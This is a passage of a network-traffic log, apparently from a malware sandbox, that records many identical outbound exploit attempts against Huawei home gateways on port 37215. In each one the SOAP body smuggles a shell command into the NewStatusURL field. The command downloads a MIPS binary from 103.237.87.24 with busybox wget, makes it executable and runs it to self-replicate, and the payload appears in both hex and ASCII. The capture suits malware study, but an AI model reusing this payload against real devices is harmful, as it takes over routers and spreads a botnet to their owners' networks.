                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1872192.168.2.1342206197.12.86.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548485994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1873192.168.2.1357938197.219.147.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548541069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1874192.168.2.1337106197.158.184.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548551083 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1875192.168.2.1334186197.37.26.14537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548569918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1876192.168.2.134087841.54.215.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.548630953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1877192.168.2.1336440189.75.49.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549159050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1878192.168.2.1352914157.23.80.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549161911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1879192.168.2.1340420157.66.98.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549205065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1880192.168.2.1338230157.208.27.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549232006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1881192.168.2.1336216157.21.191.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.549233913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 